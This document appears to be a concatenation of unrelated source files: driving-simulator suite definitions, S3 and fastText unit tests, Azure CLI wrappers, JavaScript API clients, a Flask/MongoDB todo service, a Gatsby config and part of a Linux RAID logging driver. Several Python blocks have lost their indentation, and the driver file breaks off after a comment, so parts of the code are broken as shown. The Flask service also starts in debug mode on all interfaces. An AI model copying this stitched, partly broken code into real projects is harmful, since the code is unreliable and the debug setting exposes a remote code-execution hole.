_add('NoCrashTown01-v3-np', n_vehicles=20, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_1)
_add('NoCrashTown01-v4-np', n_vehicles=20, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_3)
_add('NoCrashTown01-v5-np', n_vehicles=100, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_1)
_add('NoCrashTown01-v6-np', n_vehicles=100, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_3)
_add('NoCrashTown02-v1', n_vehicles=0, disable_two_wheels=True, weathers=WEATHER_1)
_add('NoCrashTown02-v2', n_vehicles=0, disable_two_wheels=True, weathers=WEATHER_3)
_add('NoCrashTown02-v3', n_vehicles=15, disable_two_wheels=True, n_pedestrians=50, weathers=WEATHER_1)
_add('NoCrashTown02-v4', n_vehicles=15, disable_two_wheels=True, n_pedestrians=50, weathers=WEATHER_3)
_add('NoCrashTown02-v5', n_vehicles=70, disable_two_wheels=True, n_pedestrians=150, weathers=WEATHER_1)
_add('NoCrashTown02-v6', n_vehicles=70, disable_two_wheels=True, n_pedestrians=150, weathers=WEATHER_3)
# No ped versions
_add('NoCrashTown02-v3-np', n_vehicles=15, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_1)
_add('NoCrashTown02-v4-np', n_vehicles=15, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_3)
_add('NoCrashTown02-v5-np', n_vehicles=70, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_1)
_add('NoCrashTown02-v6-np', n_vehicles=70, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_3)
# Demo
_add('NoCrashTown01-v7', n_vehicles=100, n_pedestrians=250, weathers=WEATHER_1)
_add('NoCrashTown01-v8', n_vehicles=100, n_pedestrians=250, weathers=WEATHER_2)
_add('NoCrashTown02-v7', n_vehicles=70, n_pedestrians=150, weathers=WEATHER_1)
_add('NoCrashTown02-v8', n_vehicles=70, n_pedestrians=150, weathers=WEATHER_2)
# Weather primes.
_add('FullTown01-v5', n_vehicles=0, weathers=WEATHER_4)
_add('FullTown01-v6', n_vehicles=20, weathers=WEATHER_4)
_add('StraightTown01-v3', n_vehicles=0, weathers=WEATHER_4)
_add('TurnTown01-v3', n_vehicles=0, weathers=WEATHER_4)
_add('FullTown04-v5', n_vehicles=0, weathers=WEATHER_4)
_add('FullTown04-v6', n_vehicles=20, weathers=WEATHER_4)
_add('StraightTown04-v3', n_vehicles=0, weathers=WEATHER_4)
_add('ChangeLaneTown04-v3', n_vehicles=0, weathers=WEATHER_4)
_add('FullTown02-v5', n_vehicles=0, weathers=WEATHER_4)
_add('FullTown02-v6', n_vehicles=15, weathers=WEATHER_4)
_add('StraightTown02-v3', n_vehicles=0, weathers=WEATHER_4)
_add('TurnTown02-v3', n_vehicles=0, weathers=WEATHER_4)
# Random
_add('NoCrashTown01_noweather_empty', weathers=[1], n_vehicles=0)
_add('NoCrashTown01_noweather_regular', weathers=[1], n_vehicles=20, n_pedestrians=50)
_add('NoCrashTown01_noweather_dense', weathers=[1], n_vehicles=100, n_pedestrians=250)
_add('NoCrashTown02_noweather_empty', weathers=[1], n_vehicles=0)
_add('NoCrashTown02_noweather_regular', weathers=[1], n_vehicles=15, n_pedestrians=50)
_add('NoCrashTown02_noweather_dense', weathers=[1], n_vehicles=70, n_pedestrians=200)
_add('StraightTown01-noweather', n_vehicles=0, weathers=[1])
_add('TurnTown01-noweather', n_vehicles=0, weathers=[1])
_add('FullTown01-noweather-nav', n_vehicles=0, weathers=[1])
_add('FullTown01-noweather', n_vehicles=20, weathers=[1])
_add('StraightTown02-noweather', n_vehicles=0, weathers=[1])
_add('TurnTown02-noweather', n_vehicles=0, weathers=[1])
_add('FullTown02-noweather-nav', n_vehicles=0, weathers=[1])
_add('FullTown02-noweather', n_vehicles=15, weathers=[1])
ALL_SUITES_ALIASES = {
'town1': [
'FullTown01-v1', 'FullTown01-v2', 'FullTown01-v3', 'FullTown01-v4', 'StraightTown01-v1', 'StraightTown01-v2',
'TurnTown01-v1', 'TurnTown01-v2'
],
'town2': [
'FullTown02-v1', 'FullTown02-v2', 'FullTown02-v3', 'FullTown02-v4', 'StraightTown02-v1', 'StraightTown02-v2',
'TurnTown02-v1', 'TurnTown02-v2'
],
'town4': [
'FullTown04-v1', 'FullTown04-v2', 'FullTown04-v3', 'FullTown04-v4', 'StraightTown04-v1', 'StraightTown04-v2',
'ChangeLaneTown04-v1', 'ChangeLaneTown04-v2'
],
'train': ['FullTown01-v1', 'StraightTown01-v1', 'TurnTown01-v1'],
'train_multilane': ['FullTown04-v1', 'StraightTown04-v1', 'ChangeLaneTown04-v1'],
'train_ft': ['FullTown01-v1', 'TurnTown01-v1'],
'train_veh': ['FullTown01-v1', 'FullTown01-v3'],
'validate': ['FullTown01-v5', 'FullTown02-v5'],
'test': ['FullTown02-v2', 'StraightTown02-v1', 'TurnTown02-v1'],
'test_veh': ['FullTown02-v2', 'FullTown02-v4'],
'town1p': [
'FullTown01-v5',
'FullTown01-v6',
'StraightTown01-v3',
'TurnTown01-v3',
'FullTown01-v5',
'FullTown01-v6',
],
'town2p': [
'FullTown02-v5',
'FullTown02-v6',
'StraightTown02-v3',
'TurnTown02-v3',
'FullTown02-v5',
'FullTown02-v6',
],
'ntown1p': [
'NoCrashTown01-v7',
'NoCrashTown01-v8',
'NoCrashTown01-v9',
],
'ntown2p': [
'NoCrashTown02-v7',
'NoCrashTown02-v8',
'NoCrashTown02-v9',
],
'empty': [
'NoCrashTown01-v1',
'NoCrashTown01-v2',
'NoCrashTown02-v1',
'NoCrashTown02-v2',
],
'regular': [
'NoCrashTown01-v3',
'NoCrashTown01-v4',
'NoCrashTown02-v3',
'NoCrashTown02-v4',
],
'regular-np': [
'NoCrashTown01-v3-np',
'NoCrashTown01-v4-np',
'NoCrashTown02-v3-np',
'NoCrashTown02-v4-np',
],
'dense': [
'NoCrashTown01-v5',
'NoCrashTown01-v6',
'NoCrashTown02-v5',
'NoCrashTown02-v6',
],
'dense-np': [
'NoCrashTown01-v5-np',
'NoCrashTown01-v6-np',
'NoCrashTown02-v5-np',
'NoCrashTown02-v6-np',
]
}
ALL_SUITES_ALIASES['all'] = ALL_SUITES_ALIASES['town1'] + \
ALL_SUITES_ALIASES['town2']
|
import unittest
import os
import boto3
from darty.drivers.abstract import VersionExistsError, PackageNotFoundError
from darty.drivers.s3.files.driver import S3FilesDriver
from darty.drivers.s3.zip.driver import S3ZipDriver
from moto import mock_s3
from darty.output_writer import NullOutputWriter
from shutil import rmtree
def list_dir_files(dir_path):
    """Yield the path of every file under *dir_path*, relative to *dir_path*.

    Files directly in *dir_path* are yielded with a './' prefix because
    os.path.relpath returns '.' for the top directory.
    """
    for current_dir, _subdirs, names in os.walk(dir_path):
        relative = os.path.relpath(current_dir, dir_path)
        for name in names:
            yield os.path.join(relative, name)
class TestDrivers(unittest.TestCase):
    """Round-trip tests for the S3 package drivers, with S3 mocked by moto."""

    @mock_s3
    def test_upload_and_download(self):
        # Both drivers implement the same contract, so exercise them identically.
        for driver_class in [S3FilesDriver, S3ZipDriver]:
            # create a test bucket
            bucket_name = 'test-bucket-%s' % driver_class.__name__
            s3 = boto3.resource('s3')
            s3.create_bucket(Bucket=bucket_name)
            driver = driver_class(bucket_name, {})
            # upload test package
            pkg1_path = os.path.join(os.path.dirname(__file__), 'data', 'packages', 'package1')
            driver.upload_package('group1', 'artifact1', '1.1', pkg1_path, output=NullOutputWriter())
            # upload the same package second time (raises an exception)
            with self.assertRaises(VersionExistsError):
                driver.upload_package('group1', 'artifact1', '1.1', pkg1_path, output=NullOutputWriter())
            # create a folder for downloaded package
            downloaded_pkg_path = os.path.join(os.path.dirname(__file__), 'data', 'packages', 'downloaded')
            rmtree(downloaded_pkg_path, ignore_errors=True)
            os.makedirs(downloaded_pkg_path, exist_ok=True)
            # download the package
            driver.download_package('group1', 'artifact1', '1.1', downloaded_pkg_path, output=NullOutputWriter())
            # the downloaded tree must contain exactly the uploaded files
            orig_files = list(list_dir_files(pkg1_path))
            downloaded_files = list(list_dir_files(downloaded_pkg_path))
            self.assertEqual(orig_files, downloaded_files)
            rmtree(downloaded_pkg_path, ignore_errors=True)
            # download not-existing package (raises an exception)
            with self.assertRaises(PackageNotFoundError):
                driver.download_package('group1', 'artifact_doesnt_exist', '1.0', downloaded_pkg_path,
                                        output=NullOutputWriter())
if __name__ == '__main__':
unittest.main()
|
from dataclasses import dataclass
from datetime import datetime
@dataclass
class CurrencyTradeVolumeRecord:
    """One aggregated trade-volume observation for a currency pair."""
    # Observation timestamp — timezone handling is not specified here; confirm with producers.
    time: datetime
    # Pair identifier — exact format (e.g. "BTC/USD") is set by callers; confirm.
    currency_pair: str
    # Traded volume for the record's period — units determined by the data source.
    volume: float
|
'''
Manage partner namespaces.
'''
from .... pyaz_utils import _call_az
from . import event_channel, key
def show(name, resource_group):
    '''
    Get the details of a partner namespace.

    Required Parameters:
    - name -- Name of the partner namespace.
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    '''
    # locals() forwards the parameters to the az CLI by name, so the
    # parameter names above must match the az command's option names.
    return _call_az("az eventgrid partner namespace show", locals())
def delete(name, resource_group, yes=None):
    '''
    Delete a partner namespace.

    Required Parameters:
    - name -- Name of the partner namespace.
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`

    Optional Parameters:
    - yes -- Do not prompt for confirmation.
    '''
    # locals() forwards the parameters to the az CLI by name; do not rename them.
    return _call_az("az eventgrid partner namespace delete", locals())
def list(odata_query=None, resource_group=None):
    '''
    List available partner namespaces.

    Optional Parameters:
    - odata_query -- The OData query used for filtering the list results. Filtering is currently allowed on the Name property only. The supported operations include: CONTAINS, eq (for equal), ne (for not equal), AND, OR and NOT.
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    '''
    # NOTE: shadows the builtin list() inside this module, matching the az verb.
    # locals() forwards the parameters to the az CLI by name; do not rename them.
    return _call_az("az eventgrid partner namespace list", locals())
def create(name, partner_registration_id, resource_group, location=None, tags=None):
    '''
    Create a partner namespace.

    Required Parameters:
    - name -- Name of the partner namespace.
    - partner_registration_id -- The fully qualified ARM Id of the partner registration that should be associated with this partner namespace. This takes the following format: /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/partnerRegistrations/{partnerRegistrationName}.
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`

    Optional Parameters:
    - location -- Location. Values from: `az account list-locations`. You can configure the default location using `az configure --defaults location=<location>`.
    - tags -- space-separated tags: key[=value] [key[=value] ...]. Use '' to clear existing tags.
    '''
    # locals() forwards the parameters to the az CLI by name; do not rename them.
    return _call_az("az eventgrid partner namespace create", locals())
|
(function () {
  'use strict';

  // Register the TracesService factory on the `traces.services` module.
  angular
    .module('traces.services')
    .factory('TracesService', TracesService);

  // Explicit DI annotation so minification does not break injection.
  TracesService.$inject = ['$resource'];

  /**
   * $resource-based REST client for /api/traces/:traceId.
   * Adds a custom `update` action (HTTP PUT) alongside the default
   * get/query/save/remove/delete actions.
   */
  function TracesService($resource) {
    return $resource('/api/traces/:traceId', {
      traceId: '@_id' // read the id from the resource instance's _id field
    }, {
      update: {
        method: 'PUT'
      }
    });
  }
}());
|
import { Fetch } from './Fetch';
import MockAdapter from 'axios-mock-adapter';
export class BBBSApi extends Fetch {
  /**
   * BBBS backend API client.
   * @param {string} baseURL - API origin, passed through to Fetch.
   * @param {object} [options] - Fetch options; set `options.mock` to serve
   *   all requests from local fixtures via axios-mock-adapter.
   */
  constructor(baseURL, options = {}) {
    super(baseURL, options);
    if (Object.prototype.hasOwnProperty.call(options, 'mock') && options.mock) {
      this._initMock();
    }
    this._checkAuth();
  }

  // Restore the Authorization header from a JWT persisted in localStorage.
  async _checkAuth() {
    const jwtJson = localStorage.getItem('bbbs-jwt');
    if (jwtJson) {
      // JSON.parse is synchronous — the original needlessly awaited it.
      const { access } = JSON.parse(jwtJson);
      if (access) {
        this._setAuthHeader(access);
      }
    }
  }

  // Install mock handlers for every endpoint this client uses.
  _initMock() {
    this._mock = new MockAdapter(this._instance, { delayResponse: 1500 });
    // Main page
    this._mock.onGet('/main').reply(200, require('../mock/mainPage.json'));
    // Authorization: username and password are checked
    this._mock.onPost('/api/v1/token').reply((config) => {
      const { username, password } = JSON.parse(config.data);
      if (username === 'admin' && password === 'admin') {
        return [200, require('../mock/token.json')];
      } else {
        return [400, { message: 'Неверный логин или пароль' }];
      }
    });
    // List of cities.
    // Bug fix: getCities() requests '/api/v1/cities/' (trailing slash), but
    // the handler was registered for '/api/v1/cities' and never matched.
    this._mock
      .onGet('/api/v1/cities/')
      .reply(200, require('../mock/cities.json'));
    // User profile (current city etc.) — requires a valid Bearer token.
    this._mock.onGet('/api/v1/profile').reply((config) => {
      const { access } = require('../mock/token.json');
      if (!config.headers.Authorization) {
        return [401, { message: 'Не авторизован' }];
      } else if (config.headers.Authorization !== `Bearer ${access}`) {
        return [403, { message: 'Нет доступа' }];
      } else {
        return [200, require('../mock/userData.json')];
      }
    });
    // Calendar events
    this._mock
      .onGet('/api/v1/afisha/events/2')
      .reply(200, require('../mock/calendar.json'));
  }

  /**
   * Obtain JWT tokens and install the access token on this instance.
   * @returns {Promise<object>} the token payload from the server
   */
  login({ username, password }) {
    return this._instance
      .post('/api/v1/token', { username, password })
      .then(this._returnResponse)
      .then((tokens) => {
        const { access } = tokens;
        if (access) {
          this._setAuthHeader(access);
        }
        return tokens;
      });
  }

  getMainPage() {
    return this._instance.get('/main').then(this._returnResponse);
  }

  getCities() {
    return this._instance.get('/api/v1/cities/').then(this._returnResponse);
  }

  getUserProfile() {
    return this._instance.get('/api/v1/profile').then(this._returnResponse);
  }

  // Events (афиша) for the given city id.
  getEvents(cityId) {
    return this._instance
      .get(`/api/v1/afisha/events/${cityId}`)
      .then(this._returnResponse);
  }
}
|
#!/usr/bin/python
import time
from flask import Flask, jsonify, request
from flask_pymongo import PyMongo, ObjectId
app = Flask(__name__)
app.config["MONGO_URI"] = "mongodb://todo-db-0.todo-db,todo-db-1.todo-db,todo-db-2.todo-db:27017"
app.config["MONGO_DBNAME"] = "tasks"
mongo = PyMongo(app)
# Process start time, captured at import.
START = time.time()


def elapsed():
    """Return the process uptime formatted as H:MM:SS."""
    total = time.time() - START
    hours, remainder = divmod(total, 3600)
    minutes, seconds = divmod(remainder, 60)
    return "%d:%02d:%02d" % (hours, minutes, seconds)
@app.route('/', methods=["GET"])
def root():
    # List every task, hiding Mongo's internal _id field.
    result = mongo.db.tasks.find(projection={"_id": False})
    # Artificial latency — presumably for demo/load-testing; confirm before removing.
    time.sleep(0.5)
    return jsonify({"status": "ok",
                    "tasks": list(result)})
@app.route('/<tag>', methods=["POST"])
def add(tag):
    # Store the JSON request body as a task under the given tag.
    result = mongo.db.tasks.insert_one({"tag": tag, "task": request.json})
    return jsonify({"status": "ok", "id": str(result.inserted_id)})
@app.route('/<tag>', methods=["GET"])
def get(tag):
    # Return only the first task matching the tag; 404 when none exist.
    result = list(mongo.db.tasks.find({"tag": tag}, projection={"_id": False}))
    if result:
        return jsonify(result[0])
    else:
        return ('Tag not found: %s\n' % tag, 404)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8080, debug=True)
|
// Load environment variables from the environment-specific dotenv file
// (e.g. .env.development / .env.production).
require("dotenv").config({
  path: `.env.${process.env.NODE_ENV}`,
});

const contentfulConfig = {
  spaceId: process.env.CONTENTFUL_SPACE_ID,
  accessToken:
    process.env.CONTENTFUL_ACCESS_TOKEN ||
    process.env.CONTENTFUL_DELIVERY_TOKEN,
};

// If you want to use the preview API please define
// CONTENTFUL_HOST and CONTENTFUL_PREVIEW_ACCESS_TOKEN in your
// environment config.
//
// CONTENTFUL_HOST should map to `preview.contentful.com`
// CONTENTFUL_PREVIEW_ACCESS_TOKEN should map to your
// Content Preview API token
//
// For more information around the Preview API check out the documentation at
// https://www.contentful.com/developers/docs/references/content-preview-api/#/reference/spaces/space/get-a-space/console/js
//
// To change back to the normal CDA, remove the CONTENTFUL_HOST variable from your environment.
if (process.env.CONTENTFUL_HOST) {
  contentfulConfig.host = process.env.CONTENTFUL_HOST;
  contentfulConfig.accessToken = process.env.CONTENTFUL_PREVIEW_ACCESS_TOKEN;
}

// Fail fast at build time if the required Contentful credentials are missing.
const { spaceId, accessToken } = contentfulConfig;

if (!spaceId || !accessToken) {
  throw new Error(
    "Contentful spaceId and the access token need to be provided."
  );
}

module.exports = {
  siteMetadata: {
    title: "Eat The Fat",
  },
  pathPrefix: "/gatsby-contentful-starter",
  plugins: [
    "gatsby-transformer-remark",
    "gatsby-transformer-sharp",
    "gatsby-plugin-react-helmet",
    "gatsby-plugin-sharp",
    {
      resolve: "gatsby-source-contentful",
      options: contentfulConfig,
    },
    'gatsby-plugin-postcss',
    {
      resolve: `gatsby-plugin-disqus`,
      options: {
        shortname: `eatthefat`
      }
    },
  ],
};
|
"""Unit tests for the fastText backend in Annif"""
import logging
import pytest
import annif.backend
import annif.corpus
from annif.exception import NotSupportedException
fasttext = pytest.importorskip("annif.backend.fasttext")
def test_fasttext_default_params(project):
    """A backend created with empty config exposes the documented defaults."""
    fasttext_type = annif.backend.get_backend("fasttext")
    fasttext = fasttext_type(
        backend_id='fasttext',
        config_params={},
        project=project)

    expected_default_params = {
        'limit': 100,
        'chunksize': 1,
        'dim': 100,
        'lr': 0.25,
        'epoch': 5,
        'loss': 'hs',
    }
    actual_params = fasttext.params
    for param, val in expected_default_params.items():
        assert param in actual_params and actual_params[param] == val


def test_fasttext_train(document_corpus, project, datadir):
    """Training on a document corpus produces a non-empty model file."""
    fasttext_type = annif.backend.get_backend("fasttext")
    fasttext = fasttext_type(
        backend_id='fasttext',
        config_params={
            'limit': 50,
            'dim': 100,
            'lr': 0.25,
            'epoch': 20,
            'loss': 'hs'},
        project=project)

    fasttext.train(document_corpus)
    assert fasttext._model is not None
    assert datadir.join('fasttext-model').exists()
    assert datadir.join('fasttext-model').size() > 0


def test_fasttext_train_cached_jobs(project, datadir):
    """Retraining from cached training data rebuilds the removed model file."""
    assert datadir.join('fasttext-train.txt').exists()
    datadir.join('fasttext-model').remove()

    fasttext_type = annif.backend.get_backend("fasttext")
    fasttext = fasttext_type(
        backend_id='fasttext',
        config_params={
            'limit': 50,
            'dim': 100,
            'lr': 0.25,
            'epoch': 20,
            'loss': 'hs'},
        project=project)

    fasttext.train("cached", jobs=2)
    assert fasttext._model is not None
    assert datadir.join('fasttext-model').exists()
    assert datadir.join('fasttext-model').size() > 0
def test_fasttext_train_unknown_subject(tmpdir, datadir, project):
    """Documents with unknown subject URIs are tolerated during training."""
    fasttext_type = annif.backend.get_backend("fasttext")
    fasttext = fasttext_type(
        backend_id='fasttext',
        config_params={
            'limit': 50,
            'dim': 100,
            'lr': 0.25,
            'epoch': 20,
            'loss': 'hs'},
        project=project)

    tmpfile = tmpdir.join('document.tsv')
    tmpfile.write("nonexistent\thttp://example.com/nonexistent\n" +
                  "arkeologia\thttp://www.yso.fi/onto/yso/p1265")
    document_corpus = annif.corpus.DocumentFile(str(tmpfile))

    fasttext.train(document_corpus)
    assert fasttext._model is not None
    assert datadir.join('fasttext-model').exists()
    assert datadir.join('fasttext-model').size() > 0


def test_fasttext_train_nodocuments(project, empty_corpus):
    """Training on an empty corpus raises NotSupportedException."""
    fasttext_type = annif.backend.get_backend("fasttext")
    fasttext = fasttext_type(
        backend_id='fasttext',
        config_params={
            'limit': 50,
            'dim': 100,
            'lr': 0.25,
            'epoch': 20,
            'loss': 'hs'},
        project=project)

    with pytest.raises(NotSupportedException) as excinfo:
        fasttext.train(empty_corpus)
    assert 'training backend fasttext with no documents' in str(excinfo.value)


def test_train_fasttext_params(document_corpus, project, caplog):
    """Parameters passed to train() override config values and are logged."""
    logger = annif.logger
    logger.propagate = True
    fasttext_type = annif.backend.get_backend("fasttext")
    fasttext = fasttext_type(
        backend_id='fasttext',
        config_params={
            'limit': 51,
            'dim': 101,
            'lr': 0.21,
            'epoch': 21,
            'loss': 'hs'},
        project=project)
    params = {'dim': 1, 'lr': 42.1, 'epoch': 0}

    with caplog.at_level(logging.DEBUG):
        fasttext.train(document_corpus, params)
    parameters_heading = 'Backend fasttext: Model parameters:'
    assert parameters_heading in caplog.text
    for line in caplog.text.splitlines():
        if parameters_heading in line:
            assert "'dim': 1" in line
            assert "'lr': 42.1" in line
            assert "'epoch': 0" in line
def test_fasttext_train_pretrained(datadir, document_corpus, project,
pretrained_vectors):
assert pretrained_vectors.exists()
assert pretrained_vectors.size() > 0
fasttext_type = annif.backend.get_backend("fasttext")
fasttext = fasttext_type(
backend_id='fasttext',
config_params={
'limit': 50,
'dim': 100,
'lr': 0.25,
'epoch': 20,
'loss': 'hs',
'pretrainedVectors': str(pretrained_vectors)},
project=project)
fasttext.train(document_corpus)
assert fasttext._model is not None
assert datadir.join('fasttext-model').exists()
assert datadir.join('fasttext-model').size() > 0
def test_fasttext_train_pretrained_wrong_dim(datadir, document_corpus, project,
                                             pretrained_vectors):
    """A pretrained-vectors file whose dimensionality differs from the
    configured 'dim' must make training fail without producing a model."""
    assert pretrained_vectors.exists()
    assert pretrained_vectors.size() > 0

    backend_class = annif.backend.get_backend("fasttext")
    backend = backend_class(
        backend_id='fasttext',
        config_params={
            'limit': 50,
            'dim': 50,
            'lr': 0.25,
            'epoch': 20,
            'loss': 'hs',
            'pretrainedVectors': str(pretrained_vectors)},
        project=project)

    with pytest.raises(ValueError):
        backend.train(document_corpus)
    assert backend._model is None
def test_fasttext_suggest(project):
    """Suggesting subjects for a Finnish text about archaeology should
    return the YSO concept for 'arkeologia' among the hits."""
    fasttext_type = annif.backend.get_backend("fasttext")
    fasttext = fasttext_type(
        backend_id='fasttext',
        config_params={
            'limit': 50,
            'chunksize': 1,
            'dim': 100,
            'lr': 0.25,
            'epoch': 20,
            'loss': 'hs'},
        project=project)

    # NOTE(review): no training happens here, so this appears to rely on a
    # model left in the data directory by an earlier test -- confirm that
    # the test-ordering assumption holds.
    results = fasttext.suggest("""Arkeologiaa sanotaan joskus myös
muinaistutkimukseksi tai muinaistieteeksi. Se on humanistinen tiede
tai oikeammin joukko tieteitä, jotka tutkivat ihmisen menneisyyttä.
Tutkimusta tehdään analysoimalla muinaisjäännöksiä eli niitä jälkiä,
joita ihmisten toiminta on jättänyt maaperään tai vesistöjen
pohjaan.""")
    assert len(results) > 0
    # Resolve the raw suggestions against the project vocabulary and check
    # that the expected concept URI and label are both present.
    hits = results.as_list(project.subjects)
    assert 'http://www.yso.fi/onto/yso/p1265' in [
        result.uri for result in hits]
    assert 'arkeologia' in [result.label for result in hits]
|
/*
* linux/drivers/scsi/esas2r/esas2r_log.c
* For use with ATTO ExpressSAS R6xx SAS/SATA RAID controllers
*
* Copyright (c) 2001-2013 ATTO Technology, Inc.
* (mailto:[email protected])
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* NO WARRANTY
* THE PROGRAM IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT
* LIMITATION, ANY WARRANTIES OR CONDITIONS OF TITLE, NON-INFRINGEMENT,
* MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Each Recipient is
* solely responsible for determining the appropriateness of using and
* distributing the Program and assumes all risks associated with its
* exercise of rights under this Agreement, including but not limited to
* the risks and costs of program errors, damage to or loss of data,
* programs or equipment, and unavailability or interruption of operations.
*
* DISCLAIMER OF LIABILITY
* NEITHER RECIPIENT NOR ANY CONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING WITHOUT LIMITATION LOST PROFITS), HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS GRANTED
* HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
* USA.
*/
#include "esas2r.h"
/*
* this module within the driver is tasked with providing logging functionality.
* the event_log_level module parameter controls the level of messages that are
* written to the system log. the default level of messages that are written
* are critical and warning messages. if other types of messages are desired,
* one simply needs to load the module with the correct value for the
* event_log_level module parameter. for example:
*
* insmod <module> event_log_level=1
*
* will load the module and only critical events will be written by this module
* to the system log. if critical, warning, and information-level messages are
* desired, the correct value for the event_log_level module parameter
* would be as follows:
*
* insmod <module> event_log_level=3
*/
/* Size of the shared buffer used for formatting log messages. */
#define EVENT_LOG_BUFF_SIZE 1024

/*
 * Only messages at or below this level are written to the system log.
 * Overridable at module load time via the event_log_level parameter;
 * the default (ESAS2R_LOG_DFLT) logs critical and warning events.
 */
static long event_log_level = ESAS2R_LOG_DFLT;
/*
 * NOTE(review): S_IRUGO already includes S_IRUSR, so the second flag is
 * redundant -- the parameter is world-readable in sysfs either way.
 */
module_param(event_log_level, long, S_IRUGO | S_IRUSR);
MODULE_PARM_DESC(event_log_level,
		 "Specifies the level of events to report to the system log. Critical and warning level events are logged by default.");

/* A shared buffer to use for formatting messages. */
static char event_buffer[EVENT_LOG_BUFF_SIZE];

/* A lock to protect the shared buffer used for formatting messages. */
static DEFINE_SPINLOCK(event_buffer_lock);
/**
 * translates an esas2r-defined logging event level to a kernel logging level.
 *
 * @param [in] level the esas2r-defined logging event level to translate
 *
 * @return the corresponding kernel logging level string.
 */
static const char *translate_esas2r_event_level_to_kernel(const long level)
{
	if (level == ESAS2R_LOG_CRIT)
		return KERN_CRIT;

	if (level == ESAS2R_LOG_WARN)
		return KERN_WARNING;

	if (level == ESAS2R_LOG_INFO)
		return KERN_INFO;

	/* ESAS2R_LOG_DEBG, ESAS2R_LOG_TRCE and any unrecognized level. */
	return KERN_DEBUG;
}
/**
 * the master logging function. this function will format the message as
 * outlined by the formatting string, the input device information and the
 * substitution arguments and output the resulting string to the system log.
 *
 * @param [in] level  the event log level of the message
 * @param [in] dev    the device information, or NULL for no device prefix
 * @param [in] format the formatting string for the message
 * @param [in] args   the substitution arguments to the formatting string
 *
 * @return 0 on success, or -1 if an error occurred.
 */
static int esas2r_log_master(const long level,
			     const struct device *dev,
			     const char *format,
			     va_list args)
{
	/* Messages above the configured verbosity are silently dropped. */
	if (level <= event_log_level) {
		unsigned long flags = 0;
		int retval = 0;
		char *buffer = event_buffer;
		size_t buflen = EVENT_LOG_BUFF_SIZE;
		const char *fmt_nodev = "%s%s: ";
		const char *fmt_dev = "%s%s [%s, %s, %s]";
		const char *slevel =
			translate_esas2r_event_level_to_kernel(level);

		/*
		 * event_buffer is shared by all callers; the spinlock
		 * serializes its use (irqsave so logging from interrupt
		 * context cannot deadlock against process context).
		 */
		spin_lock_irqsave(&event_buffer_lock, flags);
		memset(buffer, 0, buflen);

		/*
		 * format the level onto the beginning of the string and do
		 * some pointer arithmetic to move the pointer to the point
		 * where the actual message can be inserted.
		 */
		if (dev == NULL) {
			snprintf(buffer, buflen, fmt_nodev, slevel,
				 ESAS2R_DRVR_NAME);
		} else {
			snprintf(buffer, buflen, fmt_dev, slevel,
				 ESAS2R_DRVR_NAME,
				 (dev->driver ? dev->driver->name : "unknown"),
				 (dev->bus ? dev->bus->name : "unknown"),
				 dev_name(dev));
		}

		/* Advance past the prefix just written. */
		buffer += strlen(event_buffer);
		buflen -= strlen(event_buffer);

		retval = vsnprintf(buffer, buflen, format, args);
		if (retval < 0) {
			/* Formatting error: drop the message entirely. */
			spin_unlock_irqrestore(&event_buffer_lock, flags);
			return -1;
		}

		/*
		 * Put a line break at the end of the formatted string so that
		 * we don't wind up with run-on messages.
		 */
		printk("%s\n", event_buffer);

		spin_unlock_irqrestore(&event_buffer_lock, flags);
	}

	return 0;
}
/**
 * formats and logs a message to the system log.
 *
 * @param [in] level  the event level of the message
 * @param [in] format the formatting string for the message
 * @param [in] ...    the substitution arguments to the formatting string
 *
 * @return 0 on success, or -1 if an error occurred.
 */
int esas2r_log(const long level, const char *format, ...)
{
	va_list args;
	int retval;

	/* Delegate to the master logger with no device information. */
	va_start(args, format);
	retval = esas2r_log_master(level, NULL, format, args);
	va_end(args);

	return retval;
}
/**
 * formats and logs a message to the system log. this message will include
 * device information.
 *
 * @param [in] level  the event level of the message
 * @param [in] dev    the device information
 * @param [in] format the formatting string for the message
 * @param [in] ...    the substitution arguments to the formatting string
 *
 * @return 0 on success, or -1 if an error occurred.
 */
int esas2r_log_dev(const long level,
		   const struct device *dev,
		   const char *format,
		   ...)
{
	va_list args;
	int retval;

	/* Same as esas2r_log() but passes the device through. */
	va_start(args, format);
	retval = esas2r_log_master(level, dev, format, args);
	va_end(args);

	return retval;
}
/**
 * logs a hex dump of a buffer to the system log, if the given event level
 * is enabled by the event_log_level module parameter.
 *
 * @param [in] level the event level of the message
 * @param [in] buf   the buffer whose contents are dumped
 * @param [in] len   the number of bytes of buf to dump
 *
 * @return always 1 (the return value carries no error information).
 */
